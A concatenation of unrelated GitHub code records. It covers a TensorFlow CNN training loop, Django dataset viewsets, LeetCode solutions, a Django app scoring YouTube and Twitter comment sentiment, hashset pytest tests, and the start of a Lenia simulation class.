dic_to_feed[x]=x_batch\n dic_to_feed[y_]=y_batch\n for _layer in layers:\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(x_batch,bins=_layer['x2_features'])\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"iter:\",itern,\"batch:\",bn,\"Loss:\",cross,\"Accuracy:\",acc)\n train_batch_acc.append(acc)\n train_batch_cross.append(cross)\n train_total_acc.append(acc)\n train_total_cross.append(cross)\n #if cross<min_train_loss:\n if str(cross) == \"nan\":\n break;\n if str(cross) != \"nan\":\n np_train_batch_acc = np.asarray(train_batch_acc)\n print(\"Train batch mean\",np_train_batch_acc.mean(),\"min:\",np_train_batch_acc.min(),\"max\",np_train_batch_acc.max())\n #if cross<min_train_loss:\n if str(cross) == \"nan\":\n print(\"Stopped by learning convergence. Loss=nan\")\n return_dic['training_message']=\"min_train_loss\"\n break;\n if str(cross) != \"nan\":\n np_train_acc = np.asarray(train_total_acc[len(train_batch)*(iters-1):])\n print(\"Train last iter mean\",np_train_acc.mean(),\"min:\",np_train_acc.min(),\"max\",np_train_acc.max())\n if save_model ==True:\n print(\"Saving model in:\",model_file)\n saving_model = saver.save(s, model_file)\n return_dic['train_acc']=train_total_acc.copy()\n return_dic['train_cross']=train_total_cross.copy()\n else:\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=test_keep_prob\n if batch_proc == False:\n cross,acc=s.run([cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"Loss:\",cross,\"Accuracy:\",acc)\n else:\n if test_batch_bool == True:\n feed_batch = test_batch\n print(\"Evaluating using test batch\")\n else:\n feed_batch = train_batch\n print(\"Evaluating using train batch\")\n total_accuracy = []\n total_loss = []\n global_acc = []\n pred_list = []\n tf_pn = []\n for bn,batch_n in enumerate(feed_batch):\n x_batch,y_batch=batch_n[0],batch_n[1]\n dic_to_feed[x]=x_batch\n dic_to_feed[y_]=y_batch\n for _layer in layers:\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(x_batch,bins=_layer['x2_features'])\n cross,acc,gacc,y_pred,tpo,tno,fpo,fno=s.run([cross_entropy,accuracy,acc_no_mean,y_CNN,tp,tn,fp,fn],feed_dict=dic_to_feed)\n #get_deconv=True\n #deconv_layer='CV2'\n #deconv_val = 'conv'\n if get_deconv==True:\n for _layer in layers:\n if 'name' in _layer.keys():\n if deconv_layer == _layer['name']:\n return_dic['deconv']=s.run(_layer[deconv_val],feed_dict=dic_to_feed)\n total_accuracy.append(acc)\n total_loss.append(cross)\n global_acc.append(gacc)\n pred_list.append(y_pred)\n tf_pn.append([tpo,tno,fpo,fno])\n print(\"batch:\",bn,\"Loss:\",cross,\"Accuracy:\",acc)\n np_acc = np.asarray(total_accuracy)\n tf_pn_np = np.asarray(tf_pn)\n tpo,tno,fpo,fno = np.sum(tf_pn_np,0).tolist()\n print(\"tp\",tpo,\"tn\",tno,\"fp\",fpo,\"fn\",fno)\n o_sensitivity = tpo/(fno+tpo+0.00001)\n o_specificity = tno/(tno+fpo+0.00001)\n print(\"Test Accuracy mean:\",np_acc.mean(),\"min:\",np_acc.min(),\"max:\",np_acc.max(),\"Sensitivity:\",o_sensitivity,\"Specificity:\",o_specificity)\n return_dic['test_acc']=total_accuracy.copy()\n return_dic['test_g_acc']=global_acc.copy()\n return_dic['y_pred']=pred_list.copy()\n return_dic['test_cross']=total_loss.copy()\n return_dic['stats']={'tp':tpo,'tn':tno,'fp':fpo,'fn':fno,'sensitivity':o_sensitivity,'specificity':o_specificity}\n print(\"Done\")\n return return_dic.copy()\n## Some utils:\ndef send_mail(email_origin,email_destination,email_pass,subject=\"Test report\",content=\"Test\"):\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n #Next, log in to the server\n server.login(email_origin,email_pass)\n msg = \"Subject:\"+subject+\" \\n\\n \"+content+\"\\n\" # The /n separates the message from the headers\n server.sendmail(email_origin,email_destination, msg)\ndef hist_batch(iNp,bins=256):\n rows = iNp.shape[0]\n for _ in range(0,rows):\n if _ == 0:\n hist_np = np.histogram(iNp[_,:],bins=bins)[0]\n hist_np = np.reshape(hist_np,(1,hist_np.shape[0]))\n else:\n hist_np_t = np.histogram(iNp[_,:],bins=bins)[0]\n hist_np_t = np.reshape(hist_np_t,(1,hist_np_t.shape[0]))\n hist_np = np.concatenate((hist_np,hist_np_t),0)\n return hist_np.copy()\ndef border_filter_pad_batch(iNp):\n rows = iNp.shape[0]\n cols = iNp.shape[1]\n sq_shape = int(np.sqrt(cols))\n for _ in range(0,rows):\n imgx_r = np.reshape(iNp[_,:],(sq_shape,sq_shape))\n if _ == 0:\n output = np.reshape(borderFilterPad(imgx_r),(1,cols))\n else:\n output_t = np.reshape(borderFilterPad(imgx_r),(1,cols))\n output = np.concatenate((output,output_t),0)\n return output.copy()\ndef borderFilterPad(np_img):\n np_imgx=np_img.copy().astype('float')\n npimgs=np_imgx.shape\n imgx=npimgs[0]\n imgy=npimgs[1]\n dx_img=np.zeros((imgx,imgy))\n for y in range(1,imgy-1):\n for x in range(1,imgx-1):\n dx_img[x,y]=np.abs(np_imgx[x+1,y]-np_imgx[x-1,y]) + np.abs(np_imgx[x,y+1]-np_imgx[x,y-1]) + np.abs(np_imgx[x+1,y+1]-np_imgx[x-1,y-1]) + np.abs(np_imgx[x-1,y+1]-np_imgx[x+1,y+1])\n total_diff = ( dx_img*255 )/( dx_img.max() - dx_img.min() )\n return total_diff.copy()","repo_name":"bsaldivaremc2/ConvolutionalNeuralNetwork-quick","sub_path":"cnn_modeling.py","file_name":"cnn_modeling.py","file_ext":"py","file_size_in_byte":29937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16656298463","text":"from geofluxus.apps.utils.views import (UnlimitedResultsSetPagination)\nfrom geofluxus.apps.utils.views import (PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet)\nfrom geofluxus.apps.asmfa.models import (DatasetType,\n Dataset)\nfrom geofluxus.apps.login.models import (GroupDataset)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeSerializer,\n DatasetSerializer)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeListSerializer,\n DatasetListSerializer)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeCreateSerializer,\n DatasetCreateSerializer)\nfrom rest_framework.response import Response\nfrom collections import OrderedDict\n\n\n# DatasetType\nclass DatasetTypeViewSet(PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet):\n queryset = DatasetType.objects.order_by('id')\n pagination_class = UnlimitedResultsSetPagination\n serializer_class = DatasetTypeSerializer\n serializers = {\n 'list': DatasetTypeListSerializer,\n 'create': DatasetTypeCreateSerializer\n }\n\n\n# Dataset\nclass DatasetViewSet(PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet):\n queryset = Dataset.objects.order_by('id')\n pagination_class = UnlimitedResultsSetPagination\n serializer_class = DatasetSerializer\n serializers = {\n 'list': DatasetListSerializer,\n 'create': DatasetCreateSerializer\n }\n\n def list(self, request, **kwargs):\n from django.http import HttpResponse\n if request.query_params.get('request', None) == 'template':\n serializer = self.serializers.get('create', None)\n if serializer and hasattr(serializer, 'create_template'):\n content = serializer.create_template()\n response = HttpResponse(\n content_type=(\n 'application/vnd.openxmlformats-officedocument.'\n 'spreadsheetml.sheet'\n )\n )\n model = self.serializer_class.Meta.model\n filename = model._meta.object_name.lower()\n response['Content-Disposition'] = \\\n 'attachment; filename={}.xlsx'.format(filename)\n response.write(content)\n return response\n\n # retrieve datasets for user\n user = request.user\n groups = user.groups.values_list('id', flat=True)\n ids = GroupDataset.objects.filter(group__id__in=groups) \\\n .values_list('dataset__id', flat=True) \\\n .distinct()\n\n # filter and serialize\n if not user.is_superuser:\n self.queryset = self.queryset.filter(id__in=ids)\n serializer = DatasetSerializer(self.queryset,\n many=True,\n context={'request': request})\n return Response(OrderedDict([\n ('count', self.queryset.count()),\n ('results', serializer.data)\n ]))","repo_name":"VasileiosBouzas/geoflux","sub_path":"geofluxus/apps/asmfa/views/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22865980478","text":"class Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix[0])\n\n counter = 0\n stack = []\n \n #n-i-1\n for i in range(n):\n stack.extend(matrix[i])\n matrix[i] = []\n \n print (\"stack: \", stack)\n for x in range(n):\n for i in range(1,n+1):\n matrix[n-i].append(stack.pop())\n \n print (\"Matrix: \", matrix)\n \n \n","repo_name":"n-chapkey/LeetCodePractice","sub_path":"0048-rotate-image/0048-rotate-image.py","file_name":"0048-rotate-image.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71315467368","text":"import re\n\nimport tweepy\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model, login\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom percentage import percentage\nfrom textblob import TextBlob\n# from langdetect import detect\nimport emoji\nfrom emot.emo_unicode import UNICODE_EMOJI\nfrom googleapiclient.discovery import build\nfrom googletrans import Translator\n# import indicnlp.transliterate.unicode_transliterate\n# from indicnlp.transliterate.unicode_transliterate.ItransTransliterator import ItransTransliterator\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom django.conf import settings\n\n# Create your views here.\nfrom sentiment.forms import InputTextForm, BasicRegForm, LoginForm\n\n\nclass EmailBackend(ModelBackend):\n def authenticate(self, username=None, password=None, **kwargs):\n UserModel = get_user_model()\n try:\n user = UserModel.objects.get(email=username)\n except UserModel.DoesNotExist:\n return None\n else:\n if user.check_password(password):\n return user\n return None\n\n\ndef login_function(request):\n login_form = LoginForm()\n if request.method == \"POST\":\n login_form = LoginForm(request.POST)\n if login_form.is_valid():\n username = login_form.cleaned_data.get('email')\n password = login_form.cleaned_data.get('password')\n user = EmailBackend.authenticate(request, username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('dashboard'))\n else:\n messages.warning(request, 'Required user was not verified')\n context = {\n \"login_form\": login_form\n }\n return render(request, 'signin.html', context)\n\n\ndef sign_up(request):\n register_form = BasicRegForm()\n if request.method == \"POST\":\n register_form = BasicRegForm(request.POST)\n if register_form.is_valid():\n tec = register_form.save(commit=False)\n password = tec.password\n tec.set_password(password)\n tec.save()\n messages.info(request, 'User register successfully')\n return HttpResponseRedirect(reverse('dashboard'))\n context = {\n \"register_form\": register_form\n }\n return render(request, 'signup.html', context)\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'dashboard.html')\n\n\n@login_required\ndef youtube_result(request):\n input_form = InputTextForm()\n if request.method == \"POST\":\n input_form = InputTextForm(request.POST)\n overall_analysis = {}\n language_group = {}\n emoji_list = []\n comment_list = []\n translated_emoji = []\n if input_form.is_valid():\n # TODO: Get youtube details\n print(input_form.cleaned_data.get('input_url'))\n youtube_video_id = fetch_youtube_video_id(input_form.cleaned_data.get('input_url'))\n # print(input_form.cleaned_data('input_url'))\n if youtube_video_id:\n comment_list = fetch_comments_youtube(youtube_video_id)\n # comment_list = [\"میں معافی چاہتا ہوں\", \"میں ٹھیک ہوں\", \"I am fine\", \"Video achi hai\", \"My name is khan 😂\", \"☮ 🙂 ❤\"]\n # if len(comment_list) > settings.COMMENTS_SIZE:\n\n for comment in comment_list:\n clean_emoji = extract_emojis(comment)\n if clean_emoji:\n emoji_list.append(clean_emoji)\n # Remove emojis from text\n remove_emoji_from_text = [comment for comment in comment_list if comment not in emoji_list]\n language_group = language_cluster(remove_emoji_from_text)\n for emojis in emoji_list:\n translated_emoji.append(convert_emojis(emojis).replace(\"_\", \" \"))\n overall_analysis = overall_sentiment_analysis(translated_emoji, language_group, len(comment_list))\n context = {\n 'input_form': input_form,\n 'result': True,\n 'overall_comments': comment_list,\n 'overall_analysis': overall_analysis,\n 'overall_language_name': [\"Emoji\", \"urdu\", \"English\", \"Roman Urdu\"],\n 'overall_language_summary': [len(emoji_list), len(language_group['urdu_cluster']),\n len(language_group['english_cluster']), len(language_group['roman_cluster'])],\n 'english_comment': language_group['english_cluster'],\n 'english_analysis': sentiment_analysis(language_group['english_cluster']),\n 'urdu_comment': language_group['urdu_cluster'],\n 'urdu_analysis': sentiment_analysis(urdu_conversion(language_group['urdu_cluster'])),\n 'emoji_comment': emoji_list,\n 'emoji_analysis': sentiment_analysis(translated_emoji),\n }\n print(context)\n return render(request, 'youtube-result.html', context)\n context = {\n 'input_form': input_form,\n \"result\": False\n }\n return render(request, 'youtube-result.html', context)\n\n\n@login_required()\ndef twitter_result(request):\n input_form = InputTextForm()\n if request.method == \"POST\":\n input_form = InputTextForm(request.POST)\n overall_analysis = {}\n language_group = {}\n emoji_list = []\n comment_list = []\n translated_emoji = []\n if input_form.is_valid():\n # TODO: Get twitter details\n print(input_form.cleaned_data.get('input_url'))\n twitter_name_id = fetch_twitter_name_id(input_form.cleaned_data.get('input_url'))\n # print(input_form.cleaned_data('input_url'))\n if twitter_name_id:\n comment_list = fetch_replies_twitter(twitter_name_id['name'],twitter_name_id['tweet'])\n # comment_list = [\"میں معافی چاہتا ہوں\", \"میں ٹھیک ہوں\", \"I am fine\", \"Video achi hai\", \"My name is khan 😂\", \"☮ 🙂 ❤\"]\n # if len(comment_list) > settings.COMMENTS_SIZE:\n\n for comment in comment_list:\n clean_emoji = extract_emojis(comment)\n if clean_emoji:\n emoji_list.append(clean_emoji)\n # Remove emojis from text\n remove_emoji_from_text = [comment for comment in comment_list if comment not in emoji_list]\n language_group = language_cluster(remove_emoji_from_text)\n for emojis in emoji_list:\n translated_emoji.append(convert_emojis(emojis).replace(\"_\", \" \"))\n overall_analysis = overall_sentiment_analysis(translated_emoji, language_group, len(comment_list))\n context = {\n 'input_form': input_form,\n 'result': True,\n 'overall_comments': comment_list,\n 'overall_analysis': overall_analysis,\n 'overall_language_name': [\"Emoji\", \"urdu\", \"English\", \"Roman Urdu\"],\n 'overall_language_summary': [len(emoji_list), len(language_group['urdu_cluster']),\n len(language_group['english_cluster']), len(language_group['roman_cluster'])],\n 'english_comment': language_group['english_cluster'],\n 'english_analysis': sentiment_analysis(language_group['english_cluster']),\n 'urdu_comment': language_group['urdu_cluster'],\n 'urdu_analysis': sentiment_analysis(urdu_conversion(language_group['urdu_cluster'])),\n 'emoji_comment': emoji_list,\n 'emoji_analysis': sentiment_analysis(translated_emoji),\n }\n print(context)\n return render(request, 'twitter-result.html', context)\n context = {\n 'input_form': input_form,\n \"result\": False\n }\n return render(request, 'twitter-result.html', context)\n\ndef fetch_twitter_name_id(twitter_url: str) -> dict:\n return {\n \"name\": twitter_url.split(\".com/\")[1].split(\"/status\")[0],\n \"twitter_id\": twitter_url.split(\"status/\")[1].split(\"?\")[0]\n }\n\n\ndef fetch_youtube_video_id(youtube_url: str) -> str:\n return youtube_url.split(\"watch?v=\")[1].split(\"&ab_channel\")[0]\n\n\ndef clean_tweets(tweet):\n tweet = re.sub(\"@[A-Za-z0-9_]+\", \"\", tweet)\n tweet = re.sub(\"#[A-Za-z0-9_]+\", \"\", tweet)\n tweet = re.sub(r'http\\S+', '', tweet)\n tweet = re.sub(r'www.\\S+', '', tweet)\n # remove numbers\n tweet = re.sub(r'\\w*\\d+\\w*', '', tweet)\n # replace over space\n tweet = re.sub('\\s{2,}', \" \", tweet)\n\n tweet = tweet.split()\n temp = \" \".join(word for word in tweet)\n return temp\n\n\ndef fetch_replies_twitter(twitter_name: str, twitter_tweet: str) -> list:\n auth = tweepy.OAuthHandler(settings.TWITTER_CONSUMER_KEY, settings.TWITTER_CONSUMER_SECRET)\n auth.set_access_token(settings.TWITTER_ACCESS_TOKEN, settings.TWITTER_ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth)\n replies = []\n # q=\"@username\", since_id=tweet_id\n for tweet in tweepy.Cursor(api.search_tweets, q='{}'.format(twitter_name), since_id=twitter_tweet,\n result_type='recent').items():\n replies.append(tweet.text)\n return [clean_tweets(tw) for tw in replies]\n\n\ndef fetch_comments_youtube(youtube_video_id: str) -> list:\n video_comments = []\n youtube = build('youtube', 'v3', developerKey=settings.YOUTUBE_API_KEY)\n video_response = youtube.commentThreads().list(\n part='snippet,replies',\n videoId=youtube_video_id\n ).execute()\n\n for item in video_response['items']:\n comment = item['snippet']['topLevelComment']['snippet']['textDisplay']\n comment = re.sub('[^a-zA-Z0-9 \\n\\.]', '', comment)\n video_comments.append(comment)\n return video_comments\n\n\ndef extract_emojis(text: str) -> str:\n characters: list\n emoji_list: list\n # # clean_text: str\n # remove all tagging and links, not need for sentiments\n # remove_keys = (\"@\", \"https://\", \"&\", \"#\")\n # # TODO: It's not necessary\n # clean_text = \" \".join(txt for txt in text if not txt.startswith(remove_keys))\n\n # setup the input, get the characters and the emoji lists\n characters = [chr for chr in text]\n emoji_list = [c for c in characters if c in emoji.UNICODE_EMOJI[\"en\"]]\n clean_emoji = \" \".join([chr for chr in text if any(i in chr for i in emoji_list)])\n return clean_emoji\n\n\ndef convert_emojis(text: str) -> str:\n for emojis in UNICODE_EMOJI:\n text = text.replace(emojis, \"_\".join(UNICODE_EMOJI[emojis].replace(\",\", \"\").replace(\":\", \"\").split()))\n return text\n\n\ndef language_cluster(sentences: list) -> dict:\n translator = Translator()\n totranslate = translator.translate(sentences)\n english_cluster, urdu_cluster, roman_cluster = [], [], []\n for detection in totranslate:\n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n \"]+\", flags=re.UNICODE)\n detection.origin = emoji_pattern.sub(r'', detection.origin)\n if detection.src == 'ur':\n urdu_cluster.append(detection.origin)\n elif detection.src == 'en':\n english_cluster.append(detection.origin)\n else:\n roman_cluster.append(detection.origin)\n return {\n \"urdu_cluster\": urdu_cluster,\n \"english_cluster\": english_cluster,\n \"roman_cluster\": roman_cluster\n }\n\n\ndef urdu_conversion(sentence: list):\n translator = Translator()\n converted = translator.translate(sentence)\n text = []\n for translation in converted:\n text.append(translation.text)\n return text\n\n\ndef sentiment_analysis(sentences: list) -> dict:\n print(len(sentences))\n if sentences:\n negative_sentiment, positive_sentiment, neutral_sentiment = 0, 0, 0\n for sentence in sentences:\n score = SentimentIntensityAnalyzer().polarity_scores(sentence)\n negative_sentiment += score['neg']\n neutral_sentiment += score['neu']\n positive_sentiment += score['pos']\n return {\n \"negative_sentiment\": (negative_sentiment / len(sentences)) * 100,\n \"neutral_sentiment\": (neutral_sentiment / len(sentences)) * 100,\n \"positive_sentiment\": (positive_sentiment / len(sentences)) * 100\n }\n\n\ndef overall_sentiment_analysis(emoji_analysis: list, languages_clusters: dict, all_comments_len: int) -> dict:\n negative_sentiment, positive_sentiment, neutral_sentiment = 0, 0, 0\n for sentence in emoji_analysis:\n score = SentimentIntensityAnalyzer().polarity_scores(sentence)\n negative_sentiment += score['neg']\n neutral_sentiment += score['neu']\n positive_sentiment += score['pos']\n\n for urdu_cluster in urdu_conversion(languages_clusters[\"urdu_cluster\"]):\n score = SentimentIntensityAnalyzer().polarity_scores(urdu_cluster)\n negative_sentiment += score['neg']\n neutral_sentiment += score['neu']\n positive_sentiment += score['pos']\n\n for english_sentence in languages_clusters[\"english_cluster\"]:\n score = SentimentIntensityAnalyzer().polarity_scores(english_sentence)\n negative_sentiment += score['neg']\n neutral_sentiment += score['neu']\n positive_sentiment += score['pos']\n\n return {\n \"negative_sentiment\": (negative_sentiment / all_comments_len) * 100,\n \"neutral_sentiment\": (neutral_sentiment / all_comments_len) * 100,\n \"positive_sentiment\": (positive_sentiment / all_comments_len) * 100\n }\n","repo_name":"Amrat-UN-Nisa/Business_sentiment_analysis_using_twitter_and_youtube_comments","sub_path":"sentiment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2676201622","text":"import pytest\n\nfrom tests.conftest import import_stuff\n\nimport_stuff('hashset')\n\n# beurk!\nfrom tests.conftest import *\n\n\n@pytest.mark.key(\"e4q1\")\nclass TestHashSet:\n\n def test_hashset_struct(self):\n try:\n HashSet()\n except NotImplementedError as e:\n assert False, e\n except TypeError:\n assert True\n\n def test_hashset_new(self, char_list):\n hs = hs_new(char_list)\n assert isinstance(hs, HashSet)\n\n def test_hashset_is_empty(self, char_list):\n hs = hs_new(char_list)\n if len(char_list) == 0:\n assert hs_is_empty(hs) is True\n else:\n assert hs_is_empty(hs) is False\n\n def test_hashset_size(self, char_list):\n hs = hs_new(char_list)\n assert hs_size(hs) == len(char_list)\n\n def test_hashset_member(self, char_list):\n hs = hs_new(char_list)\n for letter in char_list:\n assert hs_member(hs, letter) is True\n assert hs_member(hs, 'Z') is False\n\n def test_hashset_iterate(self, char_list):\n hs = hs_new(char_list)\n for letter in hs_iterate(hs):\n assert letter in char_list\n\n def test_hashset_insert(self, char_list):\n hs = hs_new()\n for letter in char_list:\n hs_insert(hs, letter)\n for letter in char_list:\n assert hs_member(hs, letter) is True\n\n def test_hashset_delete(self, char_list):\n hs = hs_new(char_list)\n for letter in char_list:\n hs_delete(hs, letter)\n assert hs_size(hs) == 0\n\n def test_hashset_union(self, char_list, char_list2):\n hs = hs_new(char_list)\n hs2 = hs_new(char_list2)\n hsboth = hs_union(hs, hs2)\n for letter in char_list:\n assert hs_member(hsboth, letter) is True\n for letter in char_list2:\n assert hs_member(hsboth, letter) is True\n\n def test_hashset_intersection(self, char_list, char_list2):\n hs = hs_new(char_list)\n hs2 = hs_new(char_list2)\n hsboth = hs_intersection(hs, hs2)\n for letter in char_list:\n if letter in char_list2:\n assert hs_member(hsboth, letter) is True\n else:\n assert hs_member(hsboth, letter) is False\n\n def test_hashset_difference(self, char_list, char_list2):\n hs = hs_new(char_list)\n hs2 = hs_new(char_list2)\n hsboth = hs_difference(hs, hs2)\n for letter in char_list:\n if letter in char_list2:\n assert hs_member(hsboth, letter) is False\n else:\n assert hs_member(hsboth, letter) is True","repo_name":"titouan-gautier/Polytech","sub_path":"INFO3A - S5/Algo & Prog/TP/tests/tp6/test_hashset_dataclass.py","file_name":"test_hashset_dataclass.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070889127","text":"# 每个 有效电子邮件地址 都由一个 本地名 和一个 域名 组成,以 '@' 符号分隔。除小写字母之外,电子邮件地址还可以含有一个或多个 '.' 或 '+' 。\n# \n# \n# \n# 例如,在 alice@leetcode.com中, alice 是 本地名 ,而 leetcode.com 是 域名 。 \n# \n# \n# 如果在电子邮件地址的 本地名 部分中的某些字符之间添加句点('.'),则发往那里的邮件将会转发到本地名中没有点的同一地址。请注意,此规则 不适用于域名 。\n# \n# \n# \n# 例如,\"alice.z@leetcode.com” 和 “alicez@leetcode.com” 会转发到同一电子邮件地址。 \n# \n# \n# 如果在 本地名 中添加加号('+'),则会忽略第一个加号后面的所有内容。这允许过滤某些电子邮件。同样,此规则 不适用于域名 。 \n# \n# \n# 例如 m.y+name@email.com 将转发到 my@email.com。 \n# \n# \n# 可以同时使用这两个规则。 \n# \n# 给你一个字符串数组 emails,我们会向每个 emails[i] 发送一封电子邮件。返回实际收到邮件的不同地址数目。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:emails = [\"test.email+alex@leetcode.com\",\"test.e.mail+bob.cathy@leetcode.\n# com\",\"testemail+david@lee.tcode.com\"]\n# 输出:2\n# 解释:实际收到邮件的是 \"testemail@leetcode.com\" 和 \"testemail@lee.tcode.com\"。\n# \n# \n# 示例 2: \n# \n# \n# 输入:emails = [\"a@leetcode.com\",\"b@leetcode.com\",\"c@leetcode.com\"]\n# 输出:3\n# \n# \n# \n# 提示: \n# \n# \n# 1 <= emails.length <= 100 \n# 1 <= emails[i].length <= 100 \n# emails[i] 由小写英文字母、'+'、'.' 和 '@' 组成 \n# 每个 emails[i] 都包含有且仅有一个 '@' 字符 \n# 所有本地名和域名都不为空 \n# 本地名不会以 '+' 字符作为开头 \n# \n# 👍 210 👎 0\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def numUniqueEmails(self, emails: List[str]) -> int:\n \"\"\"\n 方法1:哈希set\n \"\"\"\n e = set()\n\n for email in emails:\n prefix = ''\n idx, n = 0, len(email)\n while idx < n:\n ch = email[idx]\n if ch == '@' or ch == '+':\n break\n if ch != '.':\n prefix += ch\n idx += 1\n\n while idx < n and email[idx] != '@':\n idx += 1\n\n e.add(prefix + email[idx:])\n # print(e)\n return len(e)\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n # emails = [\"test.email+alex@leetcode.com\", \"test.e.mail+bob.cathy@leetcode.com\",\"testemail+david@lee.tcode.com\"]\n emails = [\"a@leetcode.com\", \"b@leetcode.com\", \"c@leetcode.com\"]\n result = Solution().numUniqueEmails(emails)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[929]独特的电子邮件地址.py","file_name":"[929]独特的电子邮件地址.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29126457835","text":"from scipy import signal\nimport numpy as np\n\n\nclass Lenia:\n \"\"\"\n worlds_init is a numpy array of starting conditions the same number of dimensions as num_channels.\n These starting conditions may be square arrays of any dimension consisting of values\n between 0 and 1, but they must all have the same dimensions and sizes of dimensions.\n\n kernels is a dictionary mapping tuples of channels to a numpy array of kernels. Kernels are arrays of the same\n dimension as worlds_init, but the size of each dimension must be less than that of worlds_init.\n For example, (1, 2) is a possible key, the value of which is the kernel that convolves with channel 2\n and acts on channel 1.\n\n growths is a dictionary mapping tuples of channels to a 2d numpy array of parameters for a function\n of the form a * bell(x; mean, std) - b where a and b are greater than or equal to 0. The parameters\n should be in the order [a, b, mean, std]. These should align with the kernel dictionary.\n\n time_step is a floating point value between 0 and 1, but usually closer to 0. This determines\n how much to \"integrate\" the values at each step of the simulation.\n\n num_channels is the integer representing the number of channels in the simulation.\n\n \"\"\"\n\n def __init__(\n self,\n worlds_init,\n kernels,\n kernel_weights,\n growth_params,\n num_channels,\n time_step,\n ):\n self.worlds = worlds_init\n self.kernels = kernels\n self.kernel_weights = kernel_weights\n self.growth_params = growth_params\n self.time_step = time_step\n self.num_channels = num_channels\n\n # TODO: There are lots of consistency checks I should run here\n\n def update(self):\n world_shape = np.shape(self.worlds[0])\n for channel_list_ind in range(self.num_channels):\n kernel_channel_list = self.kernels[channel_list_ind]\n if not kernel_channel_list:\n continue\n kernel_channel_list_len = len(kernel_channel_list)\n convolved_worlds_ind = 0\n convolved_worlds = np.zeros(shape=(kernel_channel_list_len, *world_shape))\n for group_ind in range(kernel_channel_list_len):\n kernel_group = kernel_channel_list[group_ind]\n kernel_weights_group = self.kernel_weights[channel_list_ind][group_ind]\n growth_params_group = self.growth_params[channel_list_ind][group_ind]\n\n convolve_channels = list(kernel_group.keys())\n growth_func = lambda x: self._growth(x, *tuple(growth_params_group))\n\n convolved_worlds[convolved_worlds_ind, ...] = growth_func(\n np.sum(\n [\n kernel_weights_group[convolve_channel]\n * signal.convolve(\n self.worlds[convolve_channel],\n kernel_group[convolve_channel],\n mode=\"same\",\n )\n for convolve_channel in convolve_channels\n ],\n axis=0,\n )\n )\n\n convolved_worlds_ind += 1\n\n self.worlds[channel_list_ind, ...] = self._clip(\n self.worlds[channel_list_ind, ...]\n + self.time_step * np.sum(convolved_worlds, axis=0)\n )\n\n def set_params(self, param_array, included_worlds=[]):\n num_world_params = self.worlds[included_worlds, ...].size\n\n params_ind = 0\n\n self.worlds[included_worlds, ...] = np.reshape(\n param_array[params_ind : params_ind + num_world_params],\n (len(included_worlds), *np.shape(self.worlds)[1:]),\n )\n\n params_ind += num_world_params\n\n for channel_list_ind in range(self.num_channels):\n kernel_channel_list = self.kernels[channel_list_ind]\n for group_ind in range(len(kernel_channel_list)):\n kernel_group = kernel_channel_list[group_ind]\n kernel_weights_group = self.kernel_weights[channel_list_ind][group_ind]\n for channel in kernel_group.keys():\n kernel_shape = np.shape(kernel_group[channel])\n kernel_size = np.prod(kernel_shape)\n kernel_group[channel] = np.reshape(\n 2 * (param_array[params_ind : params_ind + kernel_size] - 0.5),\n (kernel_shape),\n )\n params_ind += kernel_size\n\n kernel_weights_group[channel] = 10 * (param_array[params_ind] - 0.5)\n params_ind += 1\n\n growth_params_shape = np.shape(\n self.growth_params[channel_list_ind][group_ind]\n )\n growth_params_size = np.prod(growth_params_shape)\n self.growth_params[channel_list_ind][group_ind] = (\n param_array[params_ind : params_ind + growth_params_size] + 0.0001\n )\n params_ind += growth_params_size\n\n self.time_step = param_array[params_ind]\n\n def get_num_params(self, 